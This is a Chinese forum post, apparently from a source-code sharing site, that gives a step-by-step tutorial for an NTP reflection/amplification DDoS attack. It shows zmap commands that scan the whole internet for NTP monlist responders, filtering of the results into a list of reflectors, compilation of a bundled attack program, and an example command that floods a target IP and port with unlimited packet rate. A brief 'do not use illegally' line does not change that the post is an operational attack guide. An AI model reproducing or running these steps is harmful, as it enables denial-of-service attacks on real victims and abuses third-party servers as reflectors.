系统公告
  
欢迎你光临本站!
本站内容持续添加,多种精品源码程序!高清媒体娱乐影音应有尽有~
推荐:如需要CN2高防服务器,点击这里 自助开通!!

朕已阅

 
收藏文章 楼主
DDos发包过程教程!请勿乱用
版块:技术教程   类型:普通   作者:疯子   查看:1045   回复:0   获赞:0   时间:2023-02-05 14:35:56

系统环境为CentOS7

首先yum update后安装依赖

yum install epel-release -y

yum install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c zmap screen -y

上传下面压缩包的内容去服务器

发包脚本.rar

记得传进去后在服务器内解压,从这里开始,所有文件默认放在/root下面操作

打开一个screen并使用zmap进行扫描

screen zmap -p 123 -M udp --probe-args=file:/root/ntp_123_monlist.pkt -o monlist_fingerprint.txt

如果提示错误需要指定网卡,加一个-i 网卡名称,例如

screen zmap -i p2p1 -p 123 -M udp --probe-args=file:/root/ntp_123_monlist.pkt -o monlist_fingerprint.txt

然后就是漫长的等待,测试服务器使用500M带宽,扫描全网花了6个小时

 

扫出结果后,我们需要检查下列表内的IP哪些可以使用反射

给压缩包内的ntpchecker 777权限

chmod 777 ntpchecker

进行检查

./ntpchecker monlist_fingerprint.txt step1.txt 1 0 1

这个步骤应该10分钟就OK了,具体取决于机器性能和网络速率,怕掉线的话可以开个screen保持

检查完成后,进行格式化

awk '$2>419{print $1}' step1.txt | sort -n | uniq | sort -R > ntpamp.txt

这样我们就得到了一份可以用来进行使用的NTP列表了

压缩包内已经有了攻击程序,可以直接使用

编译压缩包内的攻击程序

gcc -lpthread ntp.c -lpcap -o ntp

到此就可以了

使用命令举例

./ntp 127.0.0.1 80 ntpamp.txt 1000 -1 100

127.0.0.1=目标IP

80=攻击端口

ntpamp.txt=过滤后的放大列表

1500=线程

-1=pps限制,-1表示无限制

100=攻击时间

请合理利用,请勿适用于非法用途

 
回复列表
默认   热门   正序   倒序

回复:DDos发包过程教程!请勿乱用

拖动滑块验证
»

Powered by rrcnzz.com

©2019 - 2024 人人站长网

本站内容来自网络仅供娱乐查阅,如侵犯版权请联系我们移除

您的IP:3.142.201.93,2024-11-27 12:14:08,Processed in 0.05508 second(s).

头像

用户名:

粉丝数:

签名:

资料 关注 好友 消息
免责声明
1、本站资源均来自网络,版权归原作者,资源和文章仅限用于学习和研究目的 。
2、不得用于商业或非法用途,否则,一切责任由使用者承担 后果!

侵权删除请致信 E-Mail:baidusw@qq.com
(0) 分享
分享

请保存二维码或复制链接进行分享

取消
已有0次打赏